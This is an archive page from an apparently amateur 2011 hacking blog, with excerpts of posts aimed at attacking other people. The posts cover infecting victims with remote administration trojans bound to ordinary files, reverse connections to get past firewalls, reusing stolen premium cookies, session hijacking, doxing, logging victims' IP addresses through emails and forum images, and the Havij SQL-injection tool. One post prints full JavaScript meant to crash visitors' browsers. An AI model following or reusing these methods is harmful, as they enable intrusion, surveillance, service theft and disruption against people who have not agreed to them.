Showing posts with label Internet Hacks. Show all posts
Showing posts with label Internet Hacks. Show all posts

Saturday, August 13, 2011

Facebook Status Update With XFBML Injection-Facebook Hacking Tweaks


In my last post, i explained how to insert HTML button in faecbook status. Now we are going to see some other Facebook Tricks using XFBML Injection.
Login to your Facebook
Paste the one of following code in address bar and hit enter.
Press the Share button.  Now go to your profile.

Continue   Reading>>

Friday, August 5, 2011

A Guide to Online Anonymity - How can i be completely untraceable ?



Definition:
The act of keeping your identity hidden online by using connection methods and encryption methods, to make yourself untraceable to a person, website, company, school or whatever else you are doing/connecting to.

Continue   Reading>>

Tuesday, August 2, 2011

How to Use Premium Cookies?edit cookies in any websites


In my last post i have explain how to hack the hotfile cookies and download like a premium account user(this article is example of cookie editing).  Here is the general tutorial to add or edit premium cookies. 

Requirements:
  • Web Developer Add on


Step 1: Install Web Developer Add on
Install the Web developer add on.  Using this add on we are going to edit the cookies


https://addons.mozilla.org/en-US/firefox/addon/web-developer/
Restart the browser. now you can see the web developer toolbar. It consist of Disbale, cookies,css,forms....etc.

Step 2: Visit website
Visit the appropriate website corresponding to your premium cookies.

 Step 3:
Now click the Cookies option in the Web developer tool bar. and select View Cookies information.  It will show list of cookies.

For adding cookies click the "Add the cookie" in the toolbar instead. then skip to the step 6.

Step 4: Find the cookie
 Find the cookie that you want to edit.  Some website store login cookie as "auth" cookie.  So find the auth cookie.



Step 5: Edit the cookie
click the edit the cookie link.
this will popup the cookie window

Step 6:

paste the premium cookies in the value field


If you are adding cookies manually, cookie name will be blank. So you have to set the correct cookie name also. usually it will be "auth"


Continue   Reading>>

Increase the Download speed of Hotfile like premium account-cookies hack


Hi Friends,  i think this is my first about hotfile.   Hotfile is file sharing website.  In hotfile , downloading speed for normal user is very slow.  But for premium account it will be faster.  In this post, i am going to explain how to downlod files from hotfile like premium account. 
Continue   Reading>>

Tuesday, July 26, 2011

What is Session Hijacking?Bypassing Login using Session Stealing?


Know what is Session?

What is Session Hijacking?
Session Hijacking is Stealing the existing active Session. The main purpose of Session Hijacking is to bypass authentication process and gain unauthorized access to the computer or Website. In simple words , hackers will login as some other client using their Sessions.

Continue   Reading>>

What is Session in computer World? Magic Cookies



What is Session?
HTTP communicates with lot of TCP connections, Server should create unique identifer for each Connection.

A Session is a unique identifier that is generated and sent to the client from a server in order to identify the Current Interaction Session.
Continue   Reading>>

Monday, July 25, 2011

Hacking Using Doxing -Doxing Complete Hacking Tutorial



Definiton of Doxing:
Doxing, derived from Document Tracing,  is gathering information about a particular person from the internet resources.  


Usually internet users left their information(Eg: gender,name,city,..) in some websites(Eg: social network,..).  So using some advanced searching Techniques, we can gather complete data about a person.  This data can be used to hack their account or trace them.
Continue   Reading>>

Saturday, July 23, 2011

How to Hack the remote system using Remote Administration Tools?




Today let us start our article with conversation.

What is RATs (Remote Administration Tools)?

N00b: Hello BreakTheSec, i heard a new Keyword RATs in hacking world? what is it? I know only about this rats.

BreakTheSec:  RATs are known as Remote Administration Tools. I hope you understand what it does from the name itself.

N00b: So it is used for hacking remote pc right?

BreakTheSec: Yes it is used for hacking into victim computers remotely. Using RATs you can get control over the remote PCs.

N00b: ok. Can you explain more about the use of RATs?

BreakTheSec: yes Sure. Here it is

Use of RATs(Remote Administration Tools)

You are able to install any malicious software(keyloggers...)
Able to monitor the Chat windows
Turn off the system remotely
You can disable antivirus/registry/restore point
Stealing the passwords and License key of their software.
Able to access Control panel
You can add or remove any programs
Show Fake Error messages to victim
Control Printers
Format the Entire Hard drive.
Open FTP(File Transfer Protocl) and transfer files
Control Internet Browser
more fun...



N00b: Thank you BreakTheSec. How to do that?

How to work with RATs ?
Step 1:

First of all you have to download Remote Administration Software and install in your system.

Step 2:
Then you have to create a server using the RAT software. Here , server is our trojan that is going to bring control over the victims system.

Step 3:
Bind the server with any files(JPEG,doc,txt...). You can bind this using some binder. Most of RATs provides Binding option also.

Step 4:
Send this file to Victim. Once the victim open the file, the server will start to run. It will disable Antivirus, registry,...depending on your configuration.

Step 5:
Find the IP address of the Victim(there is different methods to find IP address, read my previous articles). Once you got the IP address, using your Remote Administration Tool, you can connect to the Remote System.

Now World is under your control.


Noob: wow. hey BreakTheSec I have heard some where about Reverse connection in RATs. what is that?

Connections in RATs
Direct Connection:
In Direct connection, Our system(Remote administration tool installed) is client and the victim system act as server. Our system connects to the Remote System and take control over the system. You have to find the IP address of Victim and connects to the system. Some high secure Firewalls will block the Connecting to the system on Open ports.


Reverse Connection:
Reverse connections is for bypass the Firewall Restrictions on Open ports. Firewall Restrict the Open ports but not the outgoing traffics.
In a Direct connection, client connects with Server using the Open port of Server.
In reverse connection, client open the ports and server connects to the open port.


I think you confused little bit , right? In simple words,
Victim computer connects automatically to our computer in reverse connection (in Direct connection, we have to connect to victim system using their IP address).

got it?

Advantages of Reverse Connection:
  • You don't need to know what is victim IP address(because it is connecting to our system).
  • Bypassing the Firewall Restrictions

Here is the List of Popular RAT Softwares:
Popular Remote Administration Softwares List


Note:
This is just for educational purpose only. Using RAT to control unauthorized system is completely a crime. So Please don't try to do. (Discussing or Reading about thief technique is not crime but implementing)

Continue   Reading>>

Wednesday, July 20, 2011

What is Cross Site Scripting/XSS? Web Application Vulnerability


What is XSS?

XSS is Known as Cross Site Scripting.  XSS is one of Web Application Vulnerability.  Using this vulnerability , an Attacker can inject their own Malicious Client side Codes(Javascript,...) into website.

This XSS Infected web page can carry malicious codes to other users.  The innocent users will run the script(by visiting the page) without knowing the problem behind this.

Using XSS , an attacker can steal the cookies, session(session Hijacking), and other confidential data. 

Complete Tutorial will be posted soon...

Continue   Reading>>

Sunday, July 10, 2011

How to log IP of Victim using Web page? Ip Logger[Method 1]


So far, i have give some third party websites to track ip address of victim.  Today we are going to create our own website or webpage to track victim IP address.  I have written this PHP code for you.

Let me explain in two different methods
Method 1:
Log ip and redirect to some other interesting webpage(like "cute kittens pictures" page) or trusted page (like "facebook" page).

Method 2:
Log the ip and remains in same page( without redirection). I think "you won't select this method.

In this post , i will explain the method 1.

Continue   Reading>>

Sunday, July 3, 2011

How to track IP address of anyone using email?


In my old posts(find IP using mail, Track IP using image ), i have explained how to track IP address. Today also i am going to explain you advanced method. By using method you can get the IP address,location, timing of victim.

How to track IP address?

step 1:
know what is your victim email id.
For eg:
victimid[@]gmail.com
step 2:
Register an account here: http://www.readnotify.com

step 3:
send mail to victim using your readnotify.com mail account. Before sending mail append ".readnotify.com" at end of victim mail ID.
For eg:
victimid[@]gmail.com.readnotify.com

step 4:
if victim opens the mail, his info will be tracked(IP address) and mailed to your account.
Continue   Reading>>

Sunday, April 10, 2011

How to get Ip address using the Image in forums ?


Ip logging hacking
Hi friends, after long time i am going to post a hacking tutorial now.  This article will explain "how to  get ip address using the external image?"

Step 1:
First of all find a free web host service.
Here is the list of free web hosting service:
http://www.free-webhosts.com/
Get registered in any of free web hosting service.

Continue   Reading>>

Sunday, February 13, 2011

Download whole websites to your computer - and view them offline.



Website eXtractor saves you time and effort by downloading entire Internet sites (or the sections you stipulate) to your hard drive.


Whether you browse the web for research, work, or fun, there's nothing worse than having to wait for page after page to load in Internet Explorer or Netscape Navigator (or in other popular browsers). The problem is they will only load one page at a time. So if you are viewing a large website with a thousand pages, you'd have to click the mouse a thousand times ... and ... choose a directory/folder a thousands times when you want to save each file. You end up spending a lot of time waiting around and not enough time reading or viewing pages on the Internet.
The bottom line is: Using a regular browser to surf large websites or photo galleries takes the fun out of web browsing and makes research a real chore.
But now, with WebSite eXtractor, you can download whole websites (or parts of them) in one go  to your computer. You can then view the whole site offline at your leisure - and you can whiz through the saved pages at lightning speed.
NOTE: If you surf the Internet using a dial-up connection, Website eXtractor will save you money. You simply download the websites you want to view, disconnect, and then view them offline.
WebSite eXtractor is a great tool for researchers, journalists, students, equity analysts, business and marketing executives - as well as for those who want  to browse family websites containing digital photo albums. It's also ideal for viewing the large photo galleries associated with online dating.



Transfer whole websites to CD-ROM or floppy

Another big benefit of the program is it changes html-links to relative names. In other words, it turns web addresses (URLs) into addresses that work on your computer.  This means you can easily move whole websites or information to CD-ROM, floppy disk, or to another hard drive.
If you run a business, you could use this feature to put your website on to a CD-ROM or floppy disk and hand it out as an electronic brochure (saves money in postage rates). Researchers, writers, and journalists can easily archive reference material from the Internet.

Website eXtractor is designed to download websites exactly the way you want them. You can include the parts you need or exclude the parts you don't need (from directory, domain, and file names; to types of files, their size, or any other properties).

The program can download up to 100 files at a time, which saves you a huge amount of time compared to ordinary browsers. All data retrieved is stored in the directory you select and contains only the files and directories matching your filter instructions.

Website eXtractor automatically lets you download any files that were not copied due to transfer errors or bad connections. The program is equipped to run through a proxy server and download only revised or new files, bypassing documents that have already been copied - again saving your time and money (especially if you're using a dial-up connection).


For More Details and Download Software From Here:
http://www.internet-soft.com/extractor.htm


Continue   Reading>>

Saturday, February 12, 2011

Havij Tool - Automatic SQL Injection Process


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Continue   Reading>>

How to Auto Save Passwords Without Notification in IE


This brief tutorial will show you how to save your passwords and username automatically, without this annoying notification!

1. Click Tools.
2. Click Internet Options.
3. Select the Content tab.
4. Under the Autocomplete section, click Settings.
5. At this point, the Auto Complete settings Dialog box will popup. Untick the Prompt me to save passwords check box.
6. Click OK to save.
Continue   Reading>>

Wednesday, February 2, 2011

Hack to Enable Right Click in Websites



Is your favorite website disabled the right click button? No need to worry.  you can enable the Right Click button after reading this article.

There are different tools  for disabling the javascript.   But i will introduce again my favorite and best web delveloper tool for you.  This is one of best tool for hackers.

Continue   Reading>>

How to to disable right click using javascript?


I am posting this article as per the one of my user request. It is easy to disable right click in a website using javascript.

Code to disable:
oncontextmenu="alert('right click is disable');return false;"

now you may have doubt about placing this javascript code. This code should be in body as one of the attribute.

I think you can understand better if i give example.
<body oncontextmenu="alert('right click is disable');return false;"
>

i think now you understand.

see , this will disabled only for usual internet users. You can not protect it from hackers. We can disable javascript simply using webtool bar add on
Continue   Reading>>

Tuesday, February 1, 2011

Is the websites disabled the right click?


Some website may disable the right click option.  You may like to copy the contents for future use or want to see the coding how they used for particular section.   

You may know this.  This post is especially for budding hackers(not for advanced hackers, it is easy and well known). 

Copying:
What will you do when you are not able to use right click and selecting copy option in website?  It is simple just  use keyboard shortcuts like (ctrl+a for selecting all ,ctrl+c for copying. shift+left arrow or right arrow for selecting particular section). 

Viewing Source:
Press ctrl+u  for viewing the source of the page.  If you can not use the ctrl+u ,use firebug mozilla add on.

 






Continue   Reading>>

Sunday, January 30, 2011

Crashing Client's Browser with Javascript


Hi this is very simple javascript code to crash the client browser. If you don't know about javascript ,visit www.w3schools.com(i learn lot of languages quickly there).

<script type='javascript'>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
This code will reload the page again and again for infintive time and crash the browser.

How to use it?  Paste the above code in header section.  When page is loaded,the page will reload.  For that use onload handling in body as attribute. can't get you ?
Just see this example:

<body onload='crash()'>


The complete cod is:

<html>
<head>
<script type='javascript'>
function crash()
{
while(1==1)
{
location.reload(true);
}
</script>
</head>
<body onload='crash()'>
</body>
</html>




Continue   Reading>>

Friday, January 28, 2011

Chat in MS-DOS using IP address


It is easy and simple trick.  We can chat using MS-DOS(we have did this as college experiment in network lab with java code).  But i am not going to give you the java code.  Our usual Batch Programming.

You can try this in your school or college systems(it should be networked systems).

Step 1: 
 Get  the ip address of your friend's system.
if you are using college or school system,then ip address will be in particular range.

Continue   Reading>>
Older Post Home
 

© Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com